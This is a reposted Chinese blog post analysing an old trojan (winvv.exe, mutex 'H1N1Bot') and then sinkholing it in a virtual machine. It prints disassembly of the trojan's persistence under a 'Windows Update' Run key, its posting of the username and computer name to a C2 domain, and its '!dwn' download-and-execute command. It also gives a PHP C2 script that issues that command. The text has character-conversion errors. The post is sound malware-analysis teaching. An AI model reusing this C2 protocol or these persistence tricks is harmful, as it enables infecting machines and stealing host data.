一個簡單木馬分析及接管利用
近期一段時間,感受工做很是是雜亂無章,博客也基本沒時間來寫,基本每個月一篇,事實上每寫一篇也表明眼下我本身的工做狀態及內容。近期搞逆向這一塊,找了些樣本分析樣例。本身也研究了一下,感受有很多好東西。固然這些樣本很是多都過期了,甚至淘汰了。但對於學習而言仍是有點用處,這裏介紹一個簡單木馬分析及其接管利用。php
本文分析的木馬樣原本自吾愛破解論壇。早以前2010年時就有人分析過:http://www.52pojie.cn/forum.php?mod=viewthread&tid=63874,我這裏再進一步無缺分析並接管利用。樣本技術含量不如何,新手可以參考學習,高手請繞過,如下開始!web
1、樣本分析
shell
先大致上說一說這個樣本的功能,事實上很是easy。感染後在本地開一個後門,向遠端server請求指令,可以下載指定的url文件並運行。也可以清理自身。api
OD加載後。上來就是五個call:app
004014B5 > $ E8 C7FFFFFF call winvv.00401481 ; 建立相互排斥對象,防止反覆感染 004014BA . E8 D3FBFFFF call winvv.00401092 ; 拷貝自身到系統CSIDL_APPDATA路徑 004014BF . E8 EAFCFFFF call winvv.004011AE ; 加入啓動項 004014C4 > E8 0CFFFFFF call winvv.004013D5 ; 獲取本機username及計算機名。post到遠端 004014C9 . E8 71FFFFFF call winvv.0040143F ; 請求遠端server,接收遠端指令並運行對應操做 004014CE . 68 60EA0000 push 0xEA60 ; /Timeout = 60000. ms 004014D3 . E8 40000000 call <jmp.&kernel32.Sleep> ; \Sleep 004014D8 .^ EB EA jmp Xwinvv.004014C4 004014DA . 6A 00 push 0x0 ; /ExitCode = 0x0 004014DC . E8 13000000 call <jmp.&kernel32.ExitProcess> ; \ExitProcess
當中,後兩個call循環運行,隔60秒運行一次,如下分別跟進去說一下:ide
一、建立名爲"H1N1Bot"的Mutex對象。防止反覆感染工具
00401481 /$ 55 push ebp 00401482 |. 8BEC mov ebp,esp 00401484 |. 83C4 FC add esp,-0x4 00401487 |. 68 BB304000 push setup.004030BB ; /MutexName = "H1N1Bot" 0040148C |. 6A 00 push 0x0 ; |InitialOwner = FALSE 0040148E |. 6A 00 push 0x0 ; |pSecurity = NULL 00401490 |. E8 59000000 call <jmp.&kernel32.CreateMutexA> ; \CreateMutexA 00401495 |. 8945 FC mov [local.1],eax 00401498 |. E8 63000000 call <jmp.&kernel32.GetLastError> ; [GetLastError 0040149D |. 3D B7000000 cmp eax,0xB7 004014A2 |. 74 02 je Xsetup.004014A6 004014A4 |. C9 leave 004014A5 |. C3 retn 004014A6 |> FF75 FC push [local.1] ; /hObject 004014A9 |. E8 34000000 call <jmp.&kernel32.CloseHandle> ; \CloseHandle 004014AE |. 6A 00 push 0x0 ; /ExitCode = 0x0 004014B0 \. E8 3F000000 call <jmp.&kernel32.ExitProcess> ; \ExitProcess
二、獲取當前系統CSIDL_APPDATA路徑,如:C:\Documents and Settings\Administrator\Local Settings\Applicaton Data.並在後追加文件名稱"\winvv.exe",而後與當前進程鏡象路徑對照。假設當前進程不是winvv.exe。則複製當前文件到"CSIDL_APPDATA\winvv.exe",而後執行winvv.exe,並退出本進程post
00401092 /$ 55 push ebp 00401093 |. 8BEC mov ebp,esp 00401095 |. 81C4 FCFDFFFF add esp,-0x204 0040109B |. 68 00010000 push 0x100 ; /Length = 100 (256.) 004010A0 |. 8D85 00FFFFFF lea eax,[local.64] ; | 004010A6 |. 50 push eax ; |Destination 004010A7 |. E8 66040000 call <jmp.&kernel32.RtlZeroMemory> ; \RtlZeroMemory 004010AC |. 68 00010000 push 0x100 ; /Length = 100 (256.) 004010B1 |. 8D85 00FEFFFF lea eax,[local.128] ; | 004010B7 |. 50 push eax ; |Destination 004010B8 |. E8 55040000 call <jmp.&kernel32.RtlZeroMemory> ; \RtlZeroMemory 004010BD |. 68 00010000 push 0x100 ; /BufSize = 100 (256.) 004010C2 |. 8D85 00FFFFFF lea eax,[local.64] ; | 004010C8 |. 50 push eax ; |PathBuffer 004010C9 |. 6A 00 push 0x0 ; |hModule = NULL 004010CB |. E8 36040000 call <jmp.&kernel32.GetModuleFileNameA> ; \GetModuleFileNameA 004010D0 |. 8D85 00FEFFFF lea eax,[local.128] 004010D6 |. 50 push eax 004010D7 |. 6A 00 push 0x0 004010D9 |. 6A 00 push 0x0 004010DB |. 6A 1C push 0x1C 004010DD |. 6A 00 push 0x0 004010DF |. E8 7C040000 call <jmp.&shell32.SHGetFolderPathA> 004010E4 |. 68 60304000 push setup.00403060 ; /StringToAdd = "\winvv.exe" 004010E9 |. 8D85 00FEFFFF lea eax,[local.128] ; | 004010EF |. 50 push eax ; |ConcatString 004010F0 |. E8 35040000 call <jmp.&kernel32.lstrcatA> ; \lstrcatA 004010F5 |. 8D85 00FEFFFF lea eax,[local.128] ; C:\Documents and Settings\Administrator\Local Settings\Application Data\winvv.exe 004010FB |. 50 push eax ; /String2 004010FC |. 8D85 00FFFFFF lea eax,[local.64] ; | 00401102 |. 50 push eax ; |String1 00401103 |. E8 28040000 call <jmp.&kernel32.lstrcmpA> ; \lstrcmpA 00401108 |. 83F8 00 cmp eax,0x0 ; 比較路徑 0040110B |. 74 6B je Xsetup.00401178 0040110D |. 6A 00 push 0x0 ; /FailIfExists = FALSE 0040110F |. 8D85 00FEFFFF lea eax,[local.128] ; | 00401115 |. 50 push eax ; |NewFileName 00401116 |. 8D85 00FFFFFF lea eax,[local.64] ; | 0040111C |. 50 push eax ; |ExistingFileName 0040111D |. E8 C6030000 call <jmp.&kernel32.CopyFileA> ; \CopyFileA 00401122 |. 68 00010000 push 0x100 ; /Length = 100 (256.) 00401127 |. 8D85 00FFFFFF lea eax,[local.64] ; | 0040112D |. 50 push eax ; |Destination 0040112E |. E8 DF030000 call <jmp.&kernel32.RtlZeroMemory> ; \RtlZeroMemory 00401133 |. 8D85 00FFFFFF lea eax,[local.64] 00401139 |. 50 push eax 0040113A |. 6A 00 push 0x0 0040113C |. 6A 00 push 0x0 0040113E |. 6A 1C push 0x1C 00401140 |. 6A 00 push 0x0 00401142 |. E8 19040000 call <jmp.&shell32.SHGetFolderPathA> 00401147 |. 8D05 60304000 lea eax,dword ptr ds:[0x403060] 0040114D |. 40 inc eax 0040114E |. 8985 FCFDFFFF mov [local.129],eax 00401154 |. 6A 00 push 0x0 ; /IsShown = 0x0 00401156 |. 8D85 00FFFFFF lea eax,[local.64] ; | 0040115C |. 50 push eax ; |DefDir 0040115D |. 6A 00 push 0x0 ; |Parameters = NULL 0040115F |. FFB5 FCFDFFFF push [local.129] ; |FileName 00401165 |. 68 6B304000 push setup.0040306B ; |Operation = "open" 0040116A |. 6A 00 push 0x0 ; |hWnd = NULL 0040116C |. E8 F5030000 call <jmp.&shell32.ShellExecuteA> ; \ShellExecuteA 00401171 |. 6A 00 push 0x0 ; /ExitCode = 0x0 00401173 |. E8 7C030000 call <jmp.&kernel32.ExitProcess> ; \ExitProcess 00401178 |> C9 leave 00401179 \. C3 retn
三、把winvv.exe加入進啓動項"Software\Microsoft\Windows\CurrentVersion\Run\"中,項名爲"Windows Update"學習
004011AE /$ 55 push ebp 004011AF |. 8BEC mov ebp,esp 004011B1 |. 81C4 F8FEFFFF add esp,-0x108 004011B7 |. 68 00010000 push 0x100 ; /Length = 100 (256.) 004011BC |. 8D85 F8FEFFFF lea eax,[local.66] ; | 004011C2 |. 50 push eax ; |Destination 004011C3 |. E8 4A030000 call <jmp.&kernel32.RtlZeroMemory> ; \RtlZeroMemory 004011C8 |. 68 00010000 push 0x100 ; /BufSize = 100 (256.) 004011CD |. 8D85 F8FEFFFF lea eax,[local.66] ; | 004011D3 |. 50 push eax ; |PathBuffer 004011D4 |. 6A 00 push 0x0 ; |hModule = NULL 004011D6 |. E8 2B030000 call <jmp.&kernel32.GetModuleFileNameA> ; \GetModuleFileNameA 004011DB |. 8D45 FC lea eax,[local.1] 004011DE |. 50 push eax ; /pHandle 004011DF |. 6A 02 push 0x2 ; |Access = KEY_SET_VALUE 004011E1 |. 6A 00 push 0x0 ; |Reserved = 0x0 004011E3 |. 68 70304000 push winvv.00403070 ; |Subkey = "Software\Microsoft\Windows\CurrentVersion\Run\" 004011E8 |. 68 01000080 push 0x80000001 ; |hKey = HKEY_CURRENT_USER 004011ED |. E8 8C030000 call <jmp.&advapi32.RegOpenKeyExA> ; \RegOpenKeyExA 004011F2 |. 83F8 00 cmp eax,0x0 004011F5 |. 75 2D jnz Xwinvv.00401224 004011F7 |. 8D85 F8FEFFFF lea eax,[local.66] ; 獲取當前進程鏡像的路徑長度 004011FD |. 50 push eax ; /String 004011FE |. E8 39030000 call <jmp.&kernel32.lstrlenA> ; \lstrlenA 00401203 |. 50 push eax ; /BufSize 00401204 |. 8D85 F8FEFFFF lea eax,[local.66] ; | 0040120A |. 50 push eax ; |Buffer 0040120B |. 6A 01 push 0x1 ; |ValueType = REG_SZ 0040120D |. 6A 00 push 0x0 ; |Reserved = 0x0 0040120F |. 68 9F304000 push winvv.0040309F ; |ValueName = "Windows Update" 00401214 |. FF75 FC push [local.1] ; |hKey 00401217 |. E8 68030000 call <jmp.&advapi32.RegSetValueExA> ; \RegSetValueExA 0040121C |. FF75 FC push [local.1] ; /hObject 0040121F |. E8 BE020000 call <jmp.&kernel32.CloseHandle> ; \CloseHandle 00401224 |> C9 leave 00401225 \. C3 retn
四、Call 004013D5:獲取本機username及計算機名。post到遠端server:http://mmmbsbt.co.cc/admin/bot.php?url
mode=2&ident=AdministratorVMWARE
004013D5 /$ 55 push ebp 004013D6 |. 8BEC mov ebp,esp 004013D8 |. 83C4 FC add esp,-0x4 004013DB |. 6A 40 push 0x40 ; /Protect = PAGE_EXECUTE_READWRITE 004013DD |. 68 00100000 push 0x1000 ; |AllocationType = MEM_COMMIT 004013E2 |. 68 00020000 push 0x200 ; |Size = 200 (512.) 004013E7 |. 6A 00 push 0x0 ; |Address = NULL 004013E9 |. E8 30010000 call <jmp.&kernel32.VirtualAlloc> ; \VirtualAlloc 004013EE |. 8945 FC mov [local.1],eax 004013F1 |. C700 6D6F6465 mov dword ptr ds:[eax],0x65646F6D ; 填充mode=2&ident= 004013F7 |. 83C0 04 add eax,0x4 004013FA |. C700 3D322669 mov dword ptr ds:[eax],0x6926323D 00401400 |. 83C0 04 add eax,0x4 00401403 |. C700 64656E74 mov dword ptr ds:[eax],0x746E6564 00401409 |. 83C0 04 add eax,0x4 0040140C |. C600 3D mov byte ptr ds:[eax],0x3D 0040140F |. 40 inc eax 00401410 |. 50 push eax 00401411 |. 50 push eax 00401412 |. E8 74FFFFFF call winvv.0040138B ; 獲取當前系統username。並返回username長度 00401417 |. 8BC8 mov ecx,eax 00401419 |. 58 pop eax ; eax = username後地址 0040141A |. 03C1 add eax,ecx ; 此時buffer內容爲mode=2&ident=Administrator 0040141C |. 50 push eax 0040141D |. 50 push eax 0040141E |. E8 8DFFFFFF call winvv.004013B0 ; 獲取計算機名,並追加到buffer中。返回計算機名長度 00401423 |. FF75 FC push [local.1] ; 此時buffer內容爲mode=2&ident=AdministratorVMWARE 00401426 |. FF75 FC push [local.1] 00401429 |. E8 D2FBFFFF call winvv.00401000 ; 發送post請求 0040142E |. 68 00800000 push 0x8000 ; /FreeType = MEM_RELEASE 00401433 |. 6A 00 push 0x0 ; |Size = 0x0 00401435 |. FF75 FC push [local.1] ; |Address 00401438 |. E8 E7000000 call <jmp.&kernel32.VirtualFree> ; \VirtualFree 0040143D |. C9 leave 0040143E \. C3 retn
4.一、Call 0040138B:獲取當前系統username及長度
0040138B /$ 55 push ebp 0040138C |. 8BEC mov ebp,esp 0040138E |. 83C4 FC add esp,-0x4 00401391 |. C745 FC 00010>mov [local.1],0x100 00401398 |. 8D45 FC lea eax,[local.1] 0040139B |. 50 push eax ; /pBufCount 0040139C |. FF75 08 push [arg.1] ; |Buffer 0040139F |. E8 CE010000 call <jmp.&advapi32.GetUserNameA> ; \GetUserNameA 004013A4 |. FF75 08 push [arg.1] ; /String 004013A7 |. E8 90010000 call <jmp.&kernel32.lstrlenA> ; \lstrlenA 004013AC |. C9 leave 004013AD \. C2 0400 retn 0x4
4.二、Call 004013B0:獲取計算機名及長度
004013B0 /$ 55 push ebp 004013B1 |. 8BEC mov ebp,esp 004013B3 |. 83C4 FC add esp,-0x4 004013B6 |. C745 FC 00010>mov [local.1],0x100 004013BD |. 8D45 FC lea eax,[local.1] 004013C0 |. 50 push eax ; /pBufferSize 004013C1 |. FF75 08 push [arg.1] ; |Buffer 004013C4 |. E8 31010000 call <jmp.&kernel32.GetComputerNameA> ; \GetComputerNameA 004013C9 |. FF75 08 push [arg.1] ; /String 004013CC |. E8 6B010000 call <jmp.&kernel32.lstrlenA> ; \lstrlenA 004013D1 |. C9 leave 004013D2 \. C2 0400 retn 0x4
4.三、Call 00401000:發送Post請求到http://mmmbsbt.co.cc/admin/bot.php?
mode=參數
00401000 /$ 55 push ebp 00401001 |. 8BEC mov ebp,esp 00401003 |. 6A 00 push 0x0 00401005 |. 6A 00 push 0x0 00401007 |. 6A 00 push 0x0 00401009 |. 6A 00 push 0x0 0040100B |. 68 58304000 push winvv.00403058 ; ASCII "myAgent" 00401010 |. E8 3F050000 call <jmp.&wininet.InternetOpenA> ; 打開 00401015 |. 6A 01 push 0x1 00401017 |. 6A 00 push 0x0 00401019 |. 6A 03 push 0x3 0040101B |. 6A 00 push 0x0 0040101D |. 6A 00 push 0x0 0040101F |. 6A 50 push 0x50 00401021 |. 68 4A304000 push winvv.0040304A ; ASCII "mmmbsbt.co.cc" 00401026 |. 50 push eax 00401027 |. E8 22050000 call <jmp.&wininet.InternetConnectA> ; 創建鏈接 0040102C |. 6A 00 push 0x0 0040102E |. 6A 00 push 0x0 00401030 |. 6A 00 push 0x0 00401032 |. 6A 00 push 0x0 00401034 |. 6A 00 push 0x0 00401036 |. 68 37304000 push winvv.00403037 ; ASCII "admin/bot.php" 0040103B |. 68 45304000 push winvv.00403045 ; ASCII "POST" 00401040 |. 50 push eax 00401041 |. E8 FC040000 call <jmp.&wininet.HttpOpenRequestA> ; 打開請求 00401046 |. A3 AE304000 mov dword ptr ds:[0x4030AE],eax 0040104B |. FF75 08 push [arg.1] ; /請求參數 0040104E |. E8 E9040000 call <jmp.&kernel32.lstrlenA> ; \lstrlenA 00401053 |. 50 push eax 00401054 |. FF75 08 push [arg.1] 00401057 |. 6A 2F push 0x2F 00401059 |. 68 00304000 push winvv.00403000 ; ASCII "Content-Type: application/x-www-form-urlencoded" 0040105E |. FF35 AE304000 push dword ptr ds:[0x4030AE] 00401064 |. E8 DF040000 call <jmp.&wininet.HttpSendRequestA> ; 發送請求 00401069 |. 68 00020000 push 0x200 ; /Length = 200 (512.) 0040106E |. FF75 0C push [arg.2] ; |Destination 00401071 |. E8 9C040000 call <jmp.&kernel32.RtlZeroMemory> ; \RtlZeroMemory 00401076 |. 68 B2304000 push winvv.004030B2 0040107B |. 68 00020000 push 0x200 00401080 |. FF75 0C push [arg.2] 00401083 |. FF35 AE304000 push dword ptr ds:[0x4030AE] 00401089 |. E8 CC040000 call <jmp.&wininet.InternetReadFile> ; 讀取server響應 0040108E |. C9 leave 0040108F \. C2 0800 retn 0x8
五、請求遠端server:http://mmmbsbt.co.cc/admin/bot.php?mode=1,接收遠端指令並運行對應操做
0040143F /$ 55 push ebp 00401440 |. 8BEC mov ebp,esp 00401442 |. 83C4 FC add esp,-0x4 00401445 |. 6A 40 push 0x40 ; /Protect = PAGE_EXECUTE_READWRITE 00401447 |. 68 00100000 push 0x1000 ; |AllocationType = MEM_COMMIT 0040144C |. 68 00020000 push 0x200 ; |Size = 200 (512.) 00401451 |. 6A 00 push 0x0 ; |Address = NULL 00401453 |. E8 C6000000 call <jmp.&kernel32.VirtualAlloc> ; \VirtualAlloc 00401458 |. 8945 FC mov [local.1],eax 0040145B |. FF75 FC push [local.1] 0040145E |. 68 30304000 push winvv.00403030 ; ASCII "mode=1" 00401463 |. E8 98FBFFFF call winvv.00401000 ; 發送post請求 00401468 |. FF75 FC push [local.1] 0040146B |. E8 DEFEFFFF call winvv.0040134E ; 處理返回指令 00401470 |. 68 00800000 push 0x8000 ; /FreeType = MEM_RELEASE 00401475 |. 6A 00 push 0x0 ; |Size = 0x0 00401477 |. FF75 FC push [local.1] ; |Address 0040147A |. E8 A5000000 call <jmp.&kernel32.VirtualFree> ; \VirtualFree 0040147F |. C9 leave 00401480 \. C3 retn
5.一、Call 00401000:發送Post請求如4.3
5.二、Call 0040134E:處理server返回的指令
0040134E /$ 55 push ebp 0040134F |. 8BEC mov ebp,esp 00401351 |. 8B45 08 mov eax,[arg.1] 00401354 |. 8038 00 cmp byte ptr ds:[eax],0x0 ; 比較第一個byte是否爲0x0,16進制ascii碼低高位 00401357 |. 74 18 je Xwinvv.00401371 00401359 |. 8138 2164776E cmp dword ptr ds:[eax],0x6E776421 ; 比較第一個dword是否爲!dwn 0040135F |. 74 14 je Xwinvv.00401375 00401361 |. 8138 21636C6F cmp dword ptr ds:[eax],0x6F6C6321 ; 比較第一個dword是否爲!clo 00401367 |. 74 14 je Xwinvv.0040137D 00401369 |. 8138 2172656D cmp dword ptr ds:[eax],0x6D657221 ; 比較第一個dword是否爲!rem 0040136F |. 74 13 je Xwinvv.00401384 00401371 |> C9 leave 00401372 |. C2 0400 retn 0x4 00401375 |> 50 push eax 00401376 |. E8 26FFFFFF call winvv.004012A1 ; 處理!dwn指令 0040137B |.^ EB F4 jmp Xwinvv.00401371 0040137D |> E8 C4FFFFFF call winvv.00401346 ; 處理!clo指令 00401382 |.^ EB ED jmp Xwinvv.00401371 00401384 |> E8 F1FDFFFF call winvv.0040117A ; 處理!rem指令 00401389 \.^ EB F2 jmp Xwinvv.0040137D
5.2.一、Call 004012A1:處理"!dwn"指令,用於下載運行文件
格式:!dwn EXE_URL_Address File_Save_Path Optional_param (如:!dwn http://mmmbsbt.co.cc:8088/admin/1.exe c:\\1.exe kkkk)
從第一個參數爲要下載文件的url。第二個參數爲要下載文件在本地保存的路徑。第三個參數爲附加參數。主要用於辨別該文件在本地是否已經下載。第一次下載時會保存起來。
004012A1 /$ 55 push ebp 004012A2 |. 8BEC mov ebp,esp 004012A4 |. 83C4 F8 add esp,-0x8 004012A7 |. FF75 08 push [arg.1] ; /String 004012AA |. E8 8D020000 call <jmp.&kernel32.lstrlenA> ; \取得指令數據包長度 004012AF |. 83F8 05 cmp eax,0x5 ; 指令數據包長度小於5則跳出 004012B2 |. 0F8E 8A000000 jle winvv.00401342 004012B8 |. 6A 05 push 0x5 004012BA |. FF75 08 push [arg.1] 004012BD |. E8 A9FFFFFF call winvv.0040126B ; 獲取指令參數,就是!dwn之類指令後面的參數 004012C2 |. 6A 20 push 0x20 004012C4 |. FF75 08 push [arg.1] 004012C7 |. E8 5AFFFFFF call winvv.00401226 ; 在參數中尋找空格的位置截取一個參數 004012CC |. 0345 08 add eax,[arg.1] 004012CF |. C600 00 mov byte ptr ds:[eax],0x0 004012D2 |. 40 inc eax 004012D3 |. 8945 FC mov [local.1],eax 004012D6 |. 50 push eax ; /String 004012D7 |. E8 60020000 call <jmp.&kernel32.lstrlenA> ; \lstrlenA 004012DC |. 83F8 00 cmp eax,0x0 004012DF |. 74 61 je Xwinvv.00401342 ; 假設無參數了則跳出 004012E1 |. 6A 20 push 0x20 004012E3 |. FF75 FC push [local.1] 004012E6 |. E8 3BFFFFFF call winvv.00401226 ; 在參數中尋找空格的位置截取第二個參數 004012EB |. 0345 FC add eax,[local.1] 004012EE |. C600 00 mov byte ptr ds:[eax],0x0 004012F1 |. 40 inc eax 004012F2 |. 50 push eax 004012F3 |. 50 push eax ; /String 004012F4 |. E8 43020000 call <jmp.&kernel32.lstrlenA> ; \lstrlenA 004012F9 |. 83F8 00 cmp eax,0x0 004012FC |. 74 44 je Xwinvv.00401342 ; 假設無參數了則跳出 004012FE |. 58 pop eax 004012FF |. 50 push eax 00401300 |. 68 B6304000 push winvv.004030B6 ; /全局變量初始爲"0000" 00401305 |. 50 push eax ; |String1 00401306 |. E8 25020000 call <jmp.&kernel32.lstrcmpA> ; \lstrcmpA 0040130B |. 83F8 00 cmp eax,0x0 0040130E |. 74 32 je Xwinvv.00401342 ; 假設最後一個參數和全局變量比較同樣則跳出 00401310 |. 58 pop eax 00401311 |. 50 push eax ; /String2 00401312 |. 68 B6304000 push winvv.004030B6 ; |String1 = winvv.004030B6 00401317 |. E8 1A020000 call <jmp.&kernel32.lstrcpyA> ; \把最後那個參數拷貝到全局變量中 0040131C |. 6A 00 push 0x0 0040131E |. 6A 00 push 0x0 00401320 |. FF75 FC push [local.1] 00401323 |. FF75 08 push [arg.1] 00401326 |. 6A 00 push 0x0 ; 依據參數準備下載運行文件 00401328 |. E8 3F020000 call <jmp.&urlmon.URLDownloadToFileA> 0040132D |. 6A 01 push 0x1 ; /IsShown = 0x1 0040132F |. 6A 00 push 0x0 ; |DefDir = NULL 00401331 |. 6A 00 push 0x0 ; |Parameters = NULL 00401333 |. FF75 FC push [local.1] ; |FileName 00401336 |. 68 6B304000 push winvv.0040306B ; |Operation = "open" 0040133B |. 6A 00 push 0x0 ; |hWnd = NULL 0040133D |. E8 24020000 call <jmp.&shell32.ShellExecuteA> ; \ShellExecuteA 00401342 |> C9 leave 00401343 \. C2 0400 retn 0x4
5.2.二、Call 00401346:處理"!clo"指令,樣本進程退出
00401346 /$ 6A 00 push 0x0 ; /ExitCode = 0x0 00401348 \. E8 A7010000 call <jmp.&kernel32.ExitProcess> ; \ExitProcess 0040134D . C3 retn
5.2.三、Call 0040117A:處理"!rem"指令。刪除樣本的註冊表啓動項"Windows Update",並退出樣本進程
0040117A /$ 55 push ebp 0040117B |. 8BEC mov ebp,esp 0040117D |. 83C4 FC add esp,-0x4 00401180 |. 8D45 FC lea eax,[local.1] 00401183 |. 50 push eax ; /pHandle 00401184 |. 6A 02 push 0x2 ; |Access = KEY_SET_VALUE 00401186 |. 6A 00 push 0x0 ; |Reserved = 0x0 00401188 |. 68 70304000 push winvv.00403070 ; |Subkey = "Software\Microsoft\Windows\CurrentVersion\Run\" 0040118D |. 68 01000080 push 0x80000001 ; |hKey = HKEY_CURRENT_USER 00401192 |. E8 E7030000 call <jmp.&advapi32.RegOpenKeyExA> ; \RegOpenKeyExA 00401197 |. 68 9F304000 push winvv.0040309F ; /ValueName = "Windows Update" 0040119C |. FF75 FC push [local.1] ; |hKey 0040119F |. E8 D4030000 call <jmp.&advapi32.RegDeleteValueA> ; \RegDeleteValueA 004011A4 |. FF75 FC push [local.1] ; /hObject 004011A7 |. E8 36030000 call <jmp.&kernel32.CloseHandle> ; \CloseHandle 004011AC |. C9 leave 004011AD \. C3 retn
2、接管利用
分析至此,我們都很是清楚這個樣本是怎麼運做了,接下來咱們準備開始接管利用,基本思路就是架設一個webserver提供給樣本訪問,並提供對應指令給樣本運行。
一、執行環境,我這裏使用vm虛擬機,系統爲XP sp3;
二、關於域名劫持。樣本訪問的遠端域名爲mmmbsbt.co.cc,咱們得想本法把它轉走。最簡單就是經過改動hosts文件,我這裏使用了一個叫apateDNS的工具,把所有域名都轉向本地127.0.0.1,例如如下圖;
三、關於phpserver。我這裏在網上找了一個小巧的webserverEasyWebSvr1.9。而後配置php環境。
1). 到http://www.php.net站點下載PHP的安裝包。如php-5.2.4-Win32.zip(建議用php5)
2). 解壓到硬盤某個文件夾,如C:\PHP5.2.4
3). 把文件夾下的php.ini-recommended更名爲php.ini
4). 在桌面--個人電腦--右鍵--屬性--高級--環境變量。在系統變量中找到Path行,
點編輯,在原來的變量值最後添加C:\PHP5.2.4。注意用分號分隔,肯定。
5). 在EasyWebServer中點右鍵菜單--設置--映射,點加入button。
在「加入/編輯腳本映射」對話框中,擴展名欄輸入php。並指定可運行文件(即解釋器)
在c:\php5中有2個解釋器文件,
一個是CGI版的:c:\php5\php-cgi.exe
還有一個是ISAPI版的:c:\php5\php5isapi.dll
這兩個隨便選擇一個都可以,但推薦使用ISAPI版的。肯定。
6). 在」常規「選項卡下設置主文件夾及port,最後啓動server,訪問localhost,應該就可以看到效果了
四、php腳本編寫。很是easy,主要是bot.php,獲取post過來的參數內容,而後寫到一個txt中。再echo指令。我這僅僅示範!dwn,代碼例如如下:
<?php $mode=$_POST['mode']; $ident=$_POST['ident']; if(""==$ident) { $fp = fopen('zz.txt','a'); fwrite($fp,$mode.$ident."!"); fclose($fp); echo "!dwn http://mmmbsbt.co.cc:8088/admin/1.exe c:\\1.exe kkkk"; } else { $fp = fopen('zz.txt','a'); fwrite($fp,$mode.$ident."!"); fclose($fp); echo "!dwn http://mmmbsbt.co.cc:8088/admin/1.exe c:\\1.exe kkkk"; } ?>
試着訪問下如圖:
五、接着咱們要準備一個可運行文件給樣本進行下載運行,事實上可以相同用上面那個webserver,但是我這它的文件下載出了點問題。因此我又找了一個叫babyweb的小server,架設了一個server提供文件下載,下載的文件可以隨即是一個exe之類的可運行文件,我這用一個helloword程序,架設我完成例如如下圖:
六、萬事具有,接下來就是執行樣本,一轉眼後發現成功了:
3、總結
至此接管利用成功,基本思路就是域名劫持,而後webserver提供指令及下載文件,主要是指令格式那要搞清楚。眼下mmmbsbt.co.cc早已經失效。我第一步分析的時候事實上就是架設webserver提供指令一步步跟出來的,其它的點各位還有思路可以再搞搞。
轉載請註明:http://blog.csdn.net/wangqiuyun/article/details/35547765
相關文章
- 1. 利用meterpreter生成一個簡單的android木馬
- 2. 木馬病毒簡單分析
- 3. 一個釣魚木馬的分析(二)
- 4. 一件Mail木馬分析
- 5. 一次簡單的分析手機APK病毒木馬
- 6. kali做簡單木馬
- 7. (翻譯)FakeKaKao木馬分析
- 8. 木馬簡介
- 9. Backdoor.Zegost木馬病毒分析(一)
- 10. 兩個poc簡介和一個安卓木馬家族Asacub分析報告
- 更多相關文章...
- • Git 分支管理 - Git 教程
- • 第一個MyBatis程序 - MyBatis教程
- • Git可視化極簡易教程 — Git GUI使用方法
- • Github 簡明教程
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. 利用meterpreter生成一個簡單的android木馬
- 2. 木馬病毒簡單分析
- 3. 一個釣魚木馬的分析(二)
- 4. 一件Mail木馬分析
- 5. 一次簡單的分析手機APK病毒木馬
- 6. kali做簡單木馬
- 7. (翻譯)FakeKaKao木馬分析
- 8. 木馬簡介
- 9. Backdoor.Zegost木馬病毒分析(一)
- 10. 兩個poc簡介和一個安卓木馬家族Asacub分析報告